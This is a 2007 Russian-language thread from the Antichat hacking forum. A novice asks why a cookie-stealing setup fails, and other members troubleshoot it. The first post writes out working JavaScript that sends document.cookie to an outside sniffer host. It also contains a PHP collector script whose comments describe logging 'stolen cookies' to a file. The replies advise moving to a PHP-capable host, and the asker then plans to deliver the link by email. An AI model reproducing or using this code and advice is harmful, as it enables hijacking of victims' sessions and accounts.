ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

на счет перехвата cookies. что я не так делаю?
  #1  
Старый 19.07.2007, 12:27
Аватар для Miixxa
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
Провел на форуме:
35822

Репутация: 0
По умолчанию на счет перехвата cookies. что я не так делаю?

вообщем у меня вопрос на счет перехвата cookies, можете мне объяснить, что я не так делаю?
вот есть скажем к примеру:
1. лог сниффера http://hackedpro.org/tools/sniff/log.php
2. адресс сниффера http://hackedpro.org/tools/sniff/s.gif

начала с того что просто тупо в браузере ввел:
http://hackedpro.org/tools/sniff/s.gif?document.cookie

в логе посмотрел, получил инфу кроме моего cookies

далее создал файл с раширением html в котором:
<script>
img = new Image();
img.src = "http://hackedpro.org/tools/sniff/s.gif?"+document.cookie;
</script>

запустил его, эффект тот же (все кроме cookies).

Далее разместил на сайте www.miixxa.narod.ru
2 файла:
первый php-script.php в котором:
<?
$query="{$HTTP_GET_VARS['com'] }\r\n"; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
$file="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
if (is_writeable ($file)) { //проверяем можно ли производить запись в файл.
$fh=fopen ($file, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
fputs ($fh, "$query"); //записали cookies в файл.
fclose ($fh); } //после записи закрыли файл.
else {
echo "Error!"; //Этот скрипт не просто запишет украденные cookie, но и скажет нам если вышла какая-то ошибка.
}
?>

и второй файл cookies.txt

Создал третий файл 1.html в котором:

<script>
img = new Image();
img.src = "http://www.miixxa.narod.ru/php-script.php?com="+document.cookie;
</script>

запустил этот файл, проверил cookies.txt - ничего.

Что я не так делаю? можете помочь?

Последний раз редактировалось Miixxa; 19.07.2007 в 12:43.. Причина: все верно, я просто не внимательный, у меня имена файлов были верные, здесь на форуме ошибся. Жду помощи.
 
Ответить с цитированием

  #2  
Старый 19.07.2007, 12:38
Аватар для Piflit
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Miixxa  
начала с того что просто тупо в браузере ввел...
ты с полом все-таки определись))

1.php и php-script.php - разные названия одного скрипта, а они должны совпадать =)
 
Ответить с цитированием

  #3  
Старый 19.07.2007, 12:44
Аватар для Miixxa
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
Провел на форуме:
35822

Репутация: 0
По умолчанию

отредактировал, по именам фалов все ок, просто здесь ошибься.... Жду помощи в чем моя ошибка...
 
Ответить с цитированием

  #4  
Старый 19.07.2007, 12:50
Аватар для n3m0
n3m0
Участник форума
Регистрация: 11.05.2007
Сообщений: 149
Провел на форуме:
6373157

Репутация: 247
Отправить сообщение для n3m0 с помощью ICQ
По умолчанию

На НАРОД.Ру вроде нету поддержки Php
 
Ответить с цитированием

  #5  
Старый 19.07.2007, 12:51
Аватар для Y.Dmitriy
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

Это бред какой-то... почитай в манах как это делать(там все написано!), попробуй на себе...
 
Ответить с цитированием

  #6  
Старый 19.07.2007, 12:55
Аватар для Miixxa
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
Провел на форуме:
35822

Репутация: 0
По умолчанию

да, живопись интереснее, там все понятнее может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
 
Ответить с цитированием

  #7  
Старый 19.07.2007, 12:57
Аватар для Piflit
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
Провел на форуме:
5128756

Репутация: 2032


Отправить сообщение для Piflit с помощью ICQ
По умолчанию

Цитата:
Сообщение от Miixxa  
да, живопись интереснее, там все понятнее может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
хостера тебе надо изменить
 
Ответить с цитированием

  #8  
Старый 19.07.2007, 12:59
Аватар для NOmeR1
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию

Цитата:
Сообщение от Miixxa  
да, живопись интереснее, там все понятнее может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
поменяй хостинг, на котором лежит php-script.php, на любой с поддержкой PHP (tulpar.net, fatal.ru, holm.ru, 6te.net......)
 
Ответить с цитированием

  #9  
Старый 19.07.2007, 13:02
Аватар для Miixxa
Miixxa
Новичок
Регистрация: 17.07.2007
Сообщений: 17
Провел на форуме:
35822

Репутация: 0
По умолчанию

т.е. запуская файл 1.html я краду кукесы с народа.ру? а если разместить данный файл также на народе а в мыле адресу вставить ссылку на него, то кукесы опять с народа будут?
 
Ответить с цитированием

  #10  
Старый 19.07.2007, 13:03
Аватар для Y.Dmitriy
Y.Dmitriy
Постоянный
Регистрация: 14.03.2007
Сообщений: 367
Провел на форуме:
1392441

Репутация: 161
Отправить сообщение для Y.Dmitriy с помощью ICQ Отправить сообщение для Y.Dmitriy с помощью AIM Отправить сообщение для Y.Dmitriy с помощью MSN
По умолчанию

ДА НЕТ НА НАРОДЕ ИНТЕРПРИТАТОРА ПХП ФАЙЛОВ... там только статический файлы .html, .xhtml и тд... тебе нужон хостинг с поддержкой ПХП! удачи!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Социальная инженерия The real Dr.Lector Болталка 10 22.12.2008 20:45
Последние секреты тети Аси - Вся правда об Icq rijy ICQ 28 02.12.2007 07:00
Shell-аккаунт - что это? zl0ba Чужие Статьи 5 10.12.2006 01:35
Боевые вирусы (БВ). TTN_ Мировые новости 2 03.10.2006 08:30
Небольшой отрывок от книги T-REX Болталка 0 19.10.2004 05:19



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ